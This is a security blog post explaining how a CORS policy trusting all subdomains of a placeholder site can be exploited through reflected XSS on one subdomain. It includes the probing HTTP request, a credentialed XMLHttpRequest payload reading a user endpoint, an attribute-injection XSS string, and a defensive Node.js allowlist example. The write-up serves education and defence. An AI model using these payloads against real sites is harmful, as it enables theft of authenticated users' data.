Fun With CORS Misconfiguration — II

Aman Gupta

Hello all again, I hope everything is going well on your end. Today I will explain further how a CORS misconfiguration can lead to sensitive information leaks!!!!

If you haven't read my previous blog, please refer to the link below:

So this time the web application, vulnerable.com, trusted all of its subdomains, meaning that any subdomain could read the sensitive data. That makes some sense, because the subdomains are their own domain, so they can trust it. But things go wrong if an attacker finds a vulnerability on one of those subdomains and uses it to exploit the CORS misconfiguration.

This time the scenario was like this:

GET /sensitiveData HTTP/1.1
Host: vulnerable.com
Origin: https://example.vulnerable.com

This is the response I received from the server:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://example.vulnerable.com
Access-Control-Allow-Credentials: true
...

Now it's confirmed that the application trusts all of its subdomains. The server's CORS configuration was something like this:

Access-Control-Allow-Origin: *.vulnerable.com
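The following is an added example, not code from the original post: a small Node.js model of the server-side check that decides what goes into Access-Control-Allow-Origin. It contrasts the rule the post describes (trust every https subdomain of vulnerable.com) with an explicit allowlist, shows that a subdomain such as test.vulnerable.com passes the first rule and fails the second, and always pairs Access-Control-Allow-Credentials with a single echoed origin plus Vary: Origin. The allowlist entries, the look-alike host and the demo() helper are assumptions of this example.

```javascript
// Added example (not from the original post): how a server-side origin check
// decides what goes into Access-Control-Allow-Origin, comparing the permissive
// "trust every subdomain" rule from the post with an explicit allowlist.
// Hostnames and the allowlist below are assumptions for illustration.

const TRUSTED_ROOT = 'vulnerable.com';

// Explicit allowlist: only the origins that genuinely need credentialed
// cross-origin access to the API. (Assumed values.)
const ALLOWED_ORIGINS = new Set([
  'https://app.vulnerable.com',
  'https://admin.vulnerable.com',
]);

// Parse an Origin header value, or return null if it is not a bare origin.
function parseOrigin(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return null;
  }
  // A real Origin is scheme + host (+ port) only; anything extra is rejected.
  if (url.origin !== origin) return null;
  return url;
}

// The rule described in the post: any https *.vulnerable.com origin is trusted.
// The leading dot in the suffix keeps "evil-vulnerable.com" from matching.
function isAllowedWeak(origin) {
  const url = parseOrigin(origin);
  if (!url) return false;
  return url.protocol === 'https:' && url.hostname.endsWith('.' + TRUSTED_ROOT);
}

// Stricter rule: exact match against a small allowlist.
function isAllowedStrict(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

// Build the CORS response headers for a credentialed endpoint, or return null
// (meaning: send no ACAO header at all) when the origin is not allowed.
// A credentialed response must echo exactly one origin; "*" is never valid here.
function corsHeadersFor(origin, isAllowed) {
  if (!origin || !isAllowed(origin)) return null;
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    // Caches must key on Origin so one origin's ACAO value is not served to another.
    'Vary': 'Origin',
  };
}

// Walk the origins relevant to the post through both rules.
function demo() {
  const origins = [
    'https://example.vulnerable.com', // the origin in the post's request
    'https://test.vulnerable.com',    // the XSS-bearing subdomain in the post
    'https://app.vulnerable.com',     // assumed legitimate front-end
    'https://evil-vulnerable.com',    // constructed look-alike host
  ];
  const rows = origins.map((o) => ({
    origin: o,
    weak: corsHeadersFor(o, isAllowedWeak) !== null,
    strict: corsHeadersFor(o, isAllowedStrict) !== null,
  }));
  for (const r of rows) {
    console.log(`${r.origin.padEnd(34)} wildcard:${r.weak}  allowlist:${r.strict}`);
  }
  return rows;
}

demo();
```

Run it with `node` to see the table: every subdomain is accepted under the wildcard rule, while the allowlist only admits the two origins that were deliberately registered, so an XSS on an unrelated subdomain no longer gives cross-origin access to the credentialed endpoint.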

So to exploit this misconfiguration we can look for either of two vulnerabilities on their subdomains:

  1. Cross-Site Scripting on any of the subdomains.
  2. Subdomain takeover, so that we can host our own JavaScript on that subdomain and fool the victim.

I tried finding vulnerabilities on the subdomains and found reflected XSS on one of them, say https://test.vulnerable.com.

Now the only thing I need to do is inject malicious JavaScript on that subdomain and get the victim to visit that page.

Injecting the following payload into the subdomain where the XSS exists results in exploitation of the CORS misconfiguration:

function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function () {
    // Once the cross-origin response has arrived, show its body
    if (this.readyState == 4 && this.status == 200) {
      alert(this.responseText);
    }
  };
  // withCredentials makes the browser attach the victim's cookies to the request
  xhttp.open("GET", "https://vulnerable.com/auth/user", true);
  xhttp.withCredentials = true;
  xhttp.send();
}

So the name parameter on the subdomain was vulnerable, and the XSS payload looked like:

" onclick="[payload]

So it gets injected and the CORS misconfiguration is exploited successfully.

Thanks for reading.

Feedback and suggestions are most welcome!!

Twitter: https://twitter.com/gupt4j1